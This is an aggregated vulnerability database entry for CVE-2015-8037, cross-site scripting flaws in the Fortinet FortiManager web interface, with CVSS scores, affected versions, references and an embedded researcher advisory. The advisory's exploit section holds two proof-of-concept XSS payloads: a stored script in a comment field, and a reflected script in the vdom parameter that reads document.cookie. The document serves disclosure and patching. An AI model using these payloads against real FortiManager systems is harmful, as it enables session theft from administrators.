ID

VAR-201511-0089


CVE

CVE-2015-8037


TITLE

Fortinet FortiManager Graphical user interface cross-site scripting vulnerability

Trust: 0.8

sources: JVNDB: JVNDB-2015-005704

DESCRIPTION

Multiple cross-site scripting (XSS) vulnerabilities in the Graphical User Interface (GUI) in Fortinet FortiManager before 5.2.4 allow remote attackers to inject arbitrary web script or HTML via the (1) SOMVpnSSLPortalDialog or (2) FGDMngUpdHistory.

Fortinet FortiManager is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. FortiManager 5.2.2 and prior versions are vulnerable.

[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-FORTIMANAGER-XSS-0924.txt

Vendor:
================================
www.fortinet.com

Product:
================================
FortiManager v5.2.2

FortiManager is a centralized security management appliance that allows you to centrally manage any number of Fortinet Network Security devices.

2 potential XSS vectors were identified:
* XSS vulnerability in SOMVpnSSLPortalDialog.
* XSS vulnerability in FGDMngUpdHistory.

2 potential XSS vectors were identified:
* XSS vulnerability in sharedjobmanager.
* XSS vulnerability in SOMServiceObjDialog.

Affected Products
XSS items 1-2: FortiManager v5.2.2 or earlier.
XSS items 3-4: FortiManager v5.2.3 or earlier.

Solutions:
===========
No workarounds are currently available. Update to FortiManager v5.2.4.

Exploit code(s):
===============
1- Persistent:
https://localhost/cgi-bin/module/sharedobjmanager/firewall/SOMServiceObjDialog?devGrpId=18446744073709551615&deviceId=18446744073709551615&vdom=&adomId=3&vdomID=0&adomType=ems&cate=167&prodId=0&key=ALL&catetype=167&cate=167&permit_w=1&roid=189&startIndex=0&results=50

<div class="ui-comments-div"><textarea id="_comp_15" name="_comp_15" class="ui-comments-text" cols="58" maxlength="255" maxnum="255" placeholder="Write a comment" rows="1"><script>alert(666)</script></textarea><label class="ui-comments-remaining">

2- Reflected
https://localhost/cgi-bin/module/sharedobjmanager/policy_new/874/PolicyTable?vdom=%22%27/%3E%3C/script%3E%3Cscript%3Ealert%28%27[XSS%20FortiManager%20POC%20VM64%20v5.2.2%2008042015%20]\n\n%27%2bdocument.cookie%29%3C/script%3E

Disclosure Timeline:
=========================================================
Vendor Notification: August 4, 2015
September 24, 2015 : Public Disclosure

Exploitation Technique:
=======================
Remote & Local

Severity Level:
=========================================================
Medium (3)

Description:
==========================================================
Request Method(s): [+] GET
Vulnerable Product: [+] FortiManager v5.2.2 & v5.2.3 or earlier
Vulnerable Parameter(s): [+] vdom, textarea field
Affected Area(s): [+] sharedobjmanager, SOMServiceObjDialog
===========================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.

by hyp3rlinx

Trust: 2.07

sources: NVD: CVE-2015-8037 // JVNDB: JVNDB-2015-005704 // BID: 76847 // VULHUB: VHN-85998 // PACKETSTORM: 133706

AFFECTED PRODUCTS

vendor: fortinet, model: fortimanager, scope: lte, version: 5.2.3

Trust: 1.0

vendor: fortinet, model: fortimanager, scope: lt, version: 5.2.4

Trust: 0.8

vendor: fortinet, model: fortimanager, scope: eq, version: 5.2.3

Trust: 0.6

vendor: fortinet, model: fortimanager, scope: eq, version: 5.0.9

Trust: 0.3

vendor: fortinet, model: fortimanager, scope: ne, version: 5.2.4

Trust: 0.3

vendor: fortinet, model: fortimanager, scope: eq, version: 5.0

Trust: 0.3

vendor: fortinet, model: fortimanager, scope: eq, version: 5.0.3

Trust: 0.3

vendor: fortinet, model: fortimanager, scope: eq, version: 5.0.10

Trust: 0.3

vendor: fortinet, model: fortimanager, scope: eq, version: 5.0.11

Trust: 0.3

vendor: fortinet, model: fortimanager, scope: eq, version: 5.0.5

Trust: 0.3

vendor: fortinet, model: fortimanager, scope: eq, version: 5.0.8

Trust: 0.3

vendor: fortinet, model: fortimanager, scope: eq, version: 5.0.7

Trust: 0.3

vendor: fortinet, model: fortimanager, scope: eq, version: 5.2

Trust: 0.3

vendor: fortinet, model: fortimanager, scope: eq, version: 3.0

Trust: 0.3

vendor: fortinet, model: fortimanager, scope: eq, version: 5.2.1

Trust: 0.3

vendor: fortinet, model: fortimanager, scope: eq, version: 4.3

Trust: 0.3

vendor: fortinet, model: fortimanager, scope: eq, version: 5.0.6

Trust: 0.3

vendor: fortinet, model: fortimanager, scope: eq, version: 5.0.1

Trust: 0.3

vendor: fortinet, model: fortimanager, scope: eq, version: 5.2.2

Trust: 0.3

vendor: fortinet, model: fortimanager, scope: eq, version: 5.0.4

Trust: 0.3

vendor: fortinet, model: fortimanager, scope: eq, version: 5.0.2

Trust: 0.3

sources: BID: 76847 // JVNDB: JVNDB-2015-005704 // CNNVD: CNNVD-201510-765 // NVD: CVE-2015-8037

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2015-8037
value: MEDIUM

Trust: 1.0

NVD: CVE-2015-8037
value: MEDIUM

Trust: 0.8

CNNVD: CNNVD-201510-765
value: MEDIUM

Trust: 0.6

VULHUB: VHN-85998
value: MEDIUM

Trust: 0.1

nvd@nist.gov: CVE-2015-8037
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

VULHUB: VHN-85998
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

sources: VULHUB: VHN-85998 // JVNDB: JVNDB-2015-005704 // CNNVD: CNNVD-201510-765 // NVD: CVE-2015-8037

PROBLEMTYPE DATA

problemtype: CWE-79

Trust: 1.9

sources: VULHUB: VHN-85998 // JVNDB: JVNDB-2015-005704 // NVD: CVE-2015-8037

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201510-765

TYPE

xss

Trust: 0.7

sources: PACKETSTORM: 133706 // CNNVD: CNNVD-201510-765

CONFIGURATIONS

sources: JVNDB: JVNDB-2015-005704

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-85998

PATCH

title: Multiple XSS vulnerabilities in FortiManager GUI
url: http://www.fortiguard.com/advisory/multiple-xss-vulnerabilities-in-fortimanager-gui

Trust: 0.8

sources: JVNDB: JVNDB-2015-005704

EXTERNAL IDS

db: NVD, id: CVE-2015-8037

Trust: 2.6

db: BID, id: 76847

Trust: 0.9

db: JVNDB, id: JVNDB-2015-005704

Trust: 0.8

db: CNNVD, id: CNNVD-201510-765

Trust: 0.7

db: PACKETSTORM, id: 133706

Trust: 0.2

db: EXPLOIT-DB, id: 38316

Trust: 0.1

db: VULHUB, id: VHN-85998

Trust: 0.1

sources: VULHUB: VHN-85998 // BID: 76847 // JVNDB: JVNDB-2015-005704 // PACKETSTORM: 133706 // CNNVD: CNNVD-201510-765 // NVD: CVE-2015-8037

REFERENCES

url:http://www.fortiguard.com/advisory/multiple-xss-vulnerabilities-in-fortimanager-gui

Trust: 2.1

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-8037

Trust: 0.8

url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-8037

Trust: 0.8

url:http://www.securityfocus.com/bid/76847

Trust: 0.6

url:http://hyp3rlinx.altervista.org/advisories/as-fortimanager-xss-0924.txt

Trust: 0.4

url:http://www.fortinet.com/products/fortimanager/

Trust: 0.3

url:https://www.fortinet.com

Trust: 0.1

url:https://localhost/cgi-bin/module/sharedobjmanager/policy_new/874/policytable?vdom=%22%27/%3e%3c/script%3e%3cscript%3ealert%28%27[xss%20fortimanager%20poc%20vm64%20v5.2.2%2008042015%20]\n\n%27%2bdocument.cookie%29%3c/script%3e

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2015-8037

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2015-8038

Trust: 0.1

url:https://localhost/cgi-bin/module/sharedobjmanager/firewall/somserviceobjdialog?devgrpid=18446744073709551615&deviceid=18446744073709551615&vdom=&adomid=3&vdomid=0&adomtype=ems&cate=167&prodid=0&key=all&catetype=167&cate=167&permit_w=1&roid=189&startindex=0&results=50

Trust: 0.1

sources: VULHUB: VHN-85998 // BID: 76847 // JVNDB: JVNDB-2015-005704 // PACKETSTORM: 133706 // CNNVD: CNNVD-201510-765 // NVD: CVE-2015-8037

CREDITS

John Page

Trust: 0.9

sources: BID: 76847 // CNNVD: CNNVD-201510-765

SOURCES

db: VULHUB, id: VHN-85998
db: BID, id: 76847
db: JVNDB, id: JVNDB-2015-005704
db: PACKETSTORM, id: 133706
db: CNNVD, id: CNNVD-201510-765
db: NVD, id: CVE-2015-8037

LAST UPDATE DATE

2024-08-14T14:52:18.123000+00:00


SOURCES UPDATE DATE

db: VULHUB, id: VHN-85998, date: 2015-11-03T00:00:00
db: BID, id: 76847, date: 2015-09-24T00:00:00
db: JVNDB, id: JVNDB-2015-005704, date: 2015-11-04T00:00:00
db: CNNVD, id: CNNVD-201510-765, date: 2015-11-03T00:00:00
db: NVD, id: CVE-2015-8037, date: 2015-11-03T23:11:56.133

SOURCES RELEASE DATE

db: VULHUB, id: VHN-85998, date: 2015-11-02T00:00:00
db: BID, id: 76847, date: 2015-09-24T00:00:00
db: JVNDB, id: JVNDB-2015-005704, date: 2015-11-04T00:00:00
db: PACKETSTORM, id: 133706, date: 2015-09-25T07:00:13
db: CNNVD, id: CNNVD-201510-765, date: 2015-09-24T00:00:00
db: NVD, id: CVE-2015-8037, date: 2015-11-02T19:59:17.190